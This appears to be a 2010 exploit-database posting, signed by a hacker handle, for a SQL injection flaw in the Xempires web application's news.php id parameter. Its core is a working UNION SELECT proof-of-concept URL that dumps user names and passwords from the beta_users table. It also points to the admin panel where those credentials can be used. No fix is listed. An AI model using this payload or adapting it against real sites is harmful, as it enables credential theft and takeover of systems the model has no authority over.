Xempires (news.php id) SQL Injection Vulnerability

2010-05-14 20:02:03

#################################################################
# a4security.blogspot.com | www.1923Turk.Com
############################A4###################################
A information;
4 Name: Xempires (news.php) SQL Injection Vulnerability
# Auth0r: Attack3r
#################################################################
A Vulnerability Info;
4 Type: Sql injection Vulnerability
# Risk: Low
############################A4###################################
[Exploit] :

http://Attack3r/news.php?id=[Sql]

[Panel] :
http://Attack3r/admin/ << usally


[p0c] :

http://Attack3r/news.php?id=null+union+select+1,concat%28name,0x3a,pass%29,3,4,5,6,7,8,9,10,11,12,13,14+from+beta_users
#############################A4##################################
A
4 Republic Of Turkey
# Attack3r
#############################A4##################################
#Greetz;
#HaCkSpY, Black-Wolf,

Fixes

No fixes

In order to submit a new fix you need to be registered.